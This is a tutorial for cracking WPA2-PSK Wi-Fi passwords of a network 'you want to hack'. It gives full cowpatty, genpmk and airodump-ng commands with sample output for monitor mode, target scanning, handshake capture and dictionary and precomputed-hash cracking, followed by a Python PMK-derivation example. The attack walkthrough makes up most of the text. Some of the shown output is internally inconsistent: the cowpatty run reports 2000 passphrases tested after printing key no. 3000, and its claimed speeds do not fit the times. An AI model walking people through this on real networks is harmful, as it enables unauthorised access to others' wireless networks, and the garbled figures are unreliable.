Requirements:
- Kali Linux Operating System.
- Handshake File of the Network that You Want to Hack.
- Wordlist.
Cowpatty, by Joshua Wright, is a tool that automates offline dictionary attacks for cracking WPA2-PSK passwords. Cowpatty can use a pre-computed hash file instead of a plain-text word file.
This speeds up recovery of the "lost" WPA/WPA2 key of your own access point. Pre-computed hash files accelerate the password brute force when cracking WPA because they remove the need to perform, at crack time, the costly transformation of each candidate passphrase into an encryption key.
Cowpatty
To get a brief rundown of the options, type cowpatty in the terminal:
```
cowpatty
cowpatty 4.8 - WPA-PSK dictionary attack.
Usage: cowpatty [options]
    -f  Dictionary file
    -d  Hash file (genpmk)
    -r  Packet capture file
    -s  Network SSID (enclose in quotes if SSID includes spaces)
    -c  Check for valid 4-way frames, does not crack
    -h  Print this help information and exit
    -v  Print verbose information (more -v for more verbosity)
    -V  Print program version and exit
```
Kali Linux shows you this brief help screen. Cowpatty requires all of the following:
- A word list.
- A capture file in which the password hash (the 4-way handshake) has been captured.
- The SSID of the target AP.
Put the Wireless Adapter in Monitor Mode
You need to put the wireless adapter into monitor mode (assuming your interface name is wlan0):
```
airmon-ng start wlan0
```
This command will change your wireless interface name to wlan0mon.
Find The Target
Start scanning nearby wireless routers using your monitor interface:
```
airodump-ng wlan0mon
```
```
 CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:34:64:92  -29       19      1    0   6  54e  WPA2 CCMP   PSK  Linksys
 28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2 CCMP   PSK  SkyNet
 28:EF:01:34:64:91  -29       19      1    0   1  54e  WPA2 CCMP   PSK  TP-LINK
 28:EF:02:33:38:86  -42       17      0    0  11  54e  WPA2 CCMP   PSK  CISCO-Net

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57   0 - 1     0        1
```
Capture the Handshake
Next, you need to start capturing the 4-way handshake, which is where the hashed password is stored:
```
airodump-ng --bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon
```
This starts a dump on the selected AP (28:EF:01:35:34:85) on the selected channel (-c 6) and writes the capture to files prefixed handshake (airodump-ng appends a counter, giving handshake-01.cap).
```
 CH  6 ][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

 BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 28:EF:01:35:34:85   39 100       51      0    0   6  54   WPA2 CCMP   PSK  SkyNet

 BSSID              STATION            PWR   Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57   0 - 1     0        1
```
When a client connects to the AP, the handshake is captured and airodump-ng shows this in the upper right-hand corner (WPA handshake: 28:EF:01:35:34:85).
Run Cowpatty
Now that I have the hash of the password, I can use it with cowpatty and the wordlist to crack the hash:
```
cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
```
```
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 1000: angelgirl
key no. 2000: missouri
key no. 3000: birdsong

The PSK is "justletmein".

2000 passphrases tested in 294.42 seconds:  50000.00 passphrases/second
```
Cowpatty derives a key from every word in the wordlist, using the SSID as the salt, and compares the result against the captured handshake. When they match, it displays the AP's password. Because each derivation is deliberately expensive, this process is very CPU intensive and slow.
Cowpatty also supports using a pre-computed hash file rather than a plain-text word file, which makes cracking the WPA2-PSK password much faster.
You can generate your own hashes for the target SSID using a tool called genpmk:
```
genpmk -f wordlist.txt -d hash -s SkyNet
```
```
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow

2641 passphrases tested in 4.60 seconds:  451.00 passphrases/second
```
Once you have generated the hash file for that particular SSID, you can crack the password with cowpatty by typing:
```
cowpatty -d hash -r handshake-01.cap -s SkyNet
```
- -d is the pre-calculated PMK hash file,
- -r is the captured handshake file,
- -s is the network's ESSID.
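To make the "costly transformation" concrete, here is an added Python example (not cowpatty's or genpmk's own code) that derives the WPA2-PSK Pairwise Master Key the way the text describes and shows why a table precomputed with -s SkyNet is bound to that SSID: the same passphrase yields a different PMK under any other SSID, so a non-default SSID forces an attacker back to the slow per-word derivation. The sample wordlist and the second SSID ("Home-7f3a") are constructed; the passphrase "password" with SSID "IEEE" is the published IEEE 802.11i test vector used as a known answer.

```python
import hashlib
from typing import Dict, Iterable, Optional

# WPA/WPA2-PSK maps a passphrase to the 256-bit Pairwise Master Key (PMK) with
# PBKDF2-HMAC-SHA1, 4096 iterations, using the SSID as the salt. This is the
# costly per-word step that cowpatty performs at crack time and that genpmk
# precomputes into a hash file for one specific SSID.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the PMK for a passphrase/SSID pair (IEEE 802.11i PSK mapping)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA-PSK passphrase is 8 to 63 ASCII characters")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("an SSID is 1 to 32 octets")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid_bytes,
                               PBKDF2_ITERATIONS, PMK_LEN)


def precompute_pmk_table(words: Iterable[str], ssid: str) -> Dict[bytes, str]:
    """Build a PMK -> passphrase table for one SSID, the idea behind genpmk -s.

    Words that cannot be WPA-PSK passphrases (outside 8..63 characters) are skipped.
    """
    table: Dict[bytes, str] = {}
    for word in words:
        if 8 <= len(word) <= 63:
            table[derive_pmk(word, ssid)] = word
    return table


def lookup_pmk(table: Dict[bytes, str], pmk: bytes) -> Optional[str]:
    """Return the passphrase whose PMK is in the table, or None if absent."""
    return table.get(pmk)


# Constructed sample wordlist; "short" is too short to be a valid passphrase.
SAMPLE_WORDS = ["angelgirl", "missouri", "birdsong", "justletmein", "short"]

if __name__ == "__main__":
    table = precompute_pmk_table(SAMPLE_WORDS, "SkyNet")
    print("entries for SkyNet:", len(table))                              # 4
    print(lookup_pmk(table, derive_pmk("justletmein", "SkyNet")))         # justletmein
    # Same passphrase, different SSID (constructed): the SkyNet table has no answer.
    print(lookup_pmk(table, derive_pmk("justletmein", "Home-7f3a")))      # None
```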